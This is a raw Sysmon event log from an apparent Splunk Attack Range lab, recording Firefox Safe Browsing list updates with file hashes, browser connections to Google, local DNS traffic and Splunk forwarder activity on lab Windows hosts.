10:51:28.735{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=1ABEF3029EFB540884AD331D7D705433,SHA256=3E14AF62210771617B999FE4C54FEFDC15B01BB3CBB367FF4ACB1E39A7CE8D0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.731{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.vlpsetMD5=B0272F5CF9F56F11C856155DC5F40BE1,SHA256=74AB81A1929A8806D559A13140947F076CABA52BF882364C416EF4D8E9B155F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.731{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-downloadwhite-proto.metadataMD5=48A047C30981EFAEC6B882DDDDBE5760,SHA256=67A03A952869D669A35521432E8C3CAB5F306F710867A6C987026AB4BD00B466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.727{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.vlpsetMD5=3F71CB930DA9DBC51D7B0048E50D4742,SHA256=8D158E1B55D051766A3CD7FF1360B024C6247AA9C5DD5300C319E64F929228BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.723{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=94348A7540AE4AF5BBA89A9E92B56E74,SHA256=ABC18820DEA163F2B0282B36B23C5B0D7F4983CC39225FA6D58EE935ACE239D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.719{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google-trackwhite-digest256.vlpsetMD5=E54E5B84194EEE15E64D2A03F1136BB7,SHA256=07707B589BE3DBA3BB0BDAC67760A2B180EA3531E9D7976B73E4C1D8DF9DBB1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.707{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google-trackwhite-digest256.sbstoreMD5=FEC9BC354A7EE92C6FEEFE63E6B0FA26,SHA256=258EF8E6994A09FFB54BD0D5AFEC97C13C31F2EEFB7FE90A2A4C487C87817519,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.707{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flashsubdoc-digest256.vlpsetMD5=0C0D67875BD75A0227C02DD8529BA01A,SHA256=614BE0169EC36E67223EB9645A98DA66DBFDE5DFBB89BB064F428AAEABDD9D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.703{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flashsubdoc-digest256.sbstoreMD5=22698B4CF784DBBAE2D583F00491D43D,SHA256=3849563088AE0677D61702A1310FDE26DE5DDD846D53037222D3EFE012197BF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.703{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flashallow-digest256.vlpsetMD5=7194B6BFF691A056852A51E2E06CE8FE,SHA256=CBE2DC6ABFE25BEAD60F4DFAF419FC0F441FF8A8DD4A2FEBF5553BE1CBD90C49,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.703{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.703{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flash-digest256.vlpsetMD5=C2994D388F8780C87D35C352D9582985,SHA256=7ED09F7D2BD632F70077A4AE4F2BD2F3FB654B03CD72652F51678B0C7D027F25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.703{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\except-flash-digest256.sbstoreMD5=D5D6B4D59B4AE4E2DE4B40D0DA083571,SHA256=000E3A78C72A210CA3B5417A3CDD294FBCE2A31661601C9D594C75CF2800571C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.699{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\content-track-digest256.vlpsetMD5=07FF16BA9846838DA27AE094A1B91369,SHA256=DC83AE90504AC11C29876CFC48483976397E899958EE8EDE7F381971A2C2C4B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.699{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\content-track-digest256.sbstoreMD5=1B9A162CEB3C7BE8393CE348F35A4564,SHA256=2D6B6351BD1B8C2047DA1854D0033EE6C5CD9F1BFE38C5E1A2B82C86AFE8A598,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.699{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\block-flashsubdoc-digest256.vlpsetMD5=40165280FF1345B5241EC2A9D1DA2AF0,SHA256=F80BDD5341D8B1EE946E344E258EF2D35C3C0BB6B13EB7B3E6A77467DFA8B97F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.695{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\block-flashsubdoc-digest256.sbstoreMD5=B9556D03AFF392142AD5691D2F867310,SHA256=CFD3909B41C1EE3CBCB8B7D2B1378065E7D3B543FFF1F2FB7A4F25C5FF41722C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.695{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\block-flash-digest256.vlpsetMD5=130B9AC2BEEC5ADA274561105D81AE36,SHA256=7D99FEC08182A5B95D18D1569EDAA2C60C2AAFBD15A56D8882F22F3B395E6460,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.695{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\block-flash-digest256.sbstoreMD5=9F6B331AA1E070DCFEED473E76CE56C3,SHA256=7DBBEA2DD387EEB85E1F56E02FC9989ACDE570CD43BFEF2C2A827093BA87DA6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.695{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.vlpsetMD5=0DBA6F5178E8433D0EED8C5BB5223635,SHA256=262DCBF46B0C20468B29D2908412070388B9BAAF0AFED3693245F92E61E5DE00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.691{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\base-fingerprinting-track-digest256.sbstoreMD5=D65C0F2F756552800930D7EDA0264C0B,SHA256=67606ECCDB4FA978F4795C2ABC47767824C6D5AD65C3EE02E0E7445A31CF37CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.691{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\base-cryptomining-track-digest256.vlpsetMD5=82E921320B62879B070EBE9D8F1F4256,SHA256=A781BFF04964067CB06EA80DA605A4A2837F7256580693C6DBDCA971D8C9BDB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.687{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\base-cryptomining-track-digest256.sbstoreMD5=BB9BB51CB484CC5719D210D53CF37762,SHA256=1903A36C25AEB3C61953484ED931ED52AB4A3BD13FCC38046154A6681472D499,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.683{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\analytics-track-digest256.vlpsetMD5=AFD5A023DF4245E323E53D47A0BF9414,SHA256=FEE63ABE7743CA680B6C96024D9EE023C10F7C9BC1929231A663A55A79EF5D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.683{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\analytics-track-digest256.sbstoreMD5=80ED9689AB372AAC91B47B347AE5A3BD,SHA256=253E054323EF5921475DD6DFC92942944B17AD7F18FCF851C44F165687F845AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.683{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\allow-flashallow-digest256.vlpsetMD5=DE0D88480C24350C59E1E9A3583DE0D1,SHA256=01BA9F0B913E04ED10BD7166796483DD4F72005F249D6EE68B12117BE4B5D3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.683{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\allow-flashallow-digest256.sbstoreMD5=DD0458514C9A922B45DA6A8BEBE47320,SHA256=D27D5B27030F4725249377951BEB89E84A90A0E8241F0D5FD80EA59C1606E761,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.683{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\ads-track-digest256.vlpsetMD5=10DF08FF9D77ACBF8F2BFB88B4BF1E3E,SHA256=4CC64D82E2EE876BA287302C877554B9D226416AF66CDF9C0350DBB845433881,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.675{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\ads-track-digest256.sbstoreMD5=E1E560A4EAE533286AEA5189E628BBCA,SHA256=0E5F9C474D34A165AF58EFB90E76E2CEDAE8A3E4FC29A6D9B9E2CFAEACD88A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.665{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto.metadataMD5=94348A7540AE4AF5BBA89A9E92B56E74,SHA256=ABC18820DEA163F2B0282B36B23C5B0D7F4983CC39225FA6D58EE935ACE239D4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:27.109{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53471-false142.250.186.67fra24s05-in-f3.1e100.net80http 354300x8000000000000000288316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:27.082{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53470-false142.250.186.100fra24s06-in-f4.1e100.net443https 354300x8000000000000000288315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:27.035{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53469-false142.250.186.67fra24s05-in-f3.1e100.net80http 354300x8000000000000000288314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.991{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55719- 354300x8000000000000000288313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.990{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local54027-false142.250.186.100fra24s06-in-f4.1e100.net443https 354300x8000000000000000288312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.988{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local57197- 354300x8000000000000000288311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.982{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54026- 23542300x8000000000000000288310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.651{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-badbinurl-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.595{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB4297FE7EAB69299725B3B7E17F8A0D,SHA256=F8E46F7CC25876800703E02DE8F0391BA326CEEBD2EBEDF0F4A0302C1D170D80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:28.233{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=128A5E673F0C99A10259445890B50BAD,SHA256=5C90ED684CBC7401BC69F4B673D294619DBCD90ABBE980EC3876D02337B88AB5,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000288308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:27.004{C8EA50B7-11AA-6216-1605-000000003802}2228www.google.com0142.250.186.100;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000288307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:27.001{C8EA50B7-11AA-6216-1605-000000003802}2228www.google.com0::ffff:142.250.186.100;C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000288306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.487{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadataMD5=0A21D9287136B908195F2C123BF436B8,SHA256=EB7F7783CC38D3B13BAE25ECF12A92252A2B02C3FA2409F385BCE363F592730F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.473{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-unwanted-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.442{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-malware-proto.metadataMD5=1ABEF3029EFB540884AD331D7D705433,SHA256=3E14AF62210771617B999FE4C54FEFDC15B01BB3CBB367FF4ACB1E39A7CE8D0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.434{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-malware-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.382{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-phish-proto.metadataMD5=C42CB15043AEB53B51DCACA2B1EB1CE3,SHA256=AF77BDEA477472170AC8C81D619E48181CFF816D0623CADC75B57464C476DBA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000288301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:28.309{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\safebrowsing-updating\google4\goog-phish-proto-1.vlpsetMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000288374Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:27.690{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53472-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000288373Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.671{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=407FFC4579ADB78D559080A4A4756715,SHA256=906A855590B18843652BD21829EB8D27297377DE9AF96EA611915AAC4E3A4549,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:29.264{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E21F2BD6F0626A85EF116232AFC7792D,SHA256=5AB197DDF717705CAA3A47DB153DD2A5888A12289EAF015AF76B0343110A9D98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288372Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:29.586{C8EA50B7-F11F-6215-1200-000000003802}81740C:\Windows\system32\svchost.exe{C8EA50B7-11AE-6216-1A05-000000003802}3544C:\Program Files\Mozilla 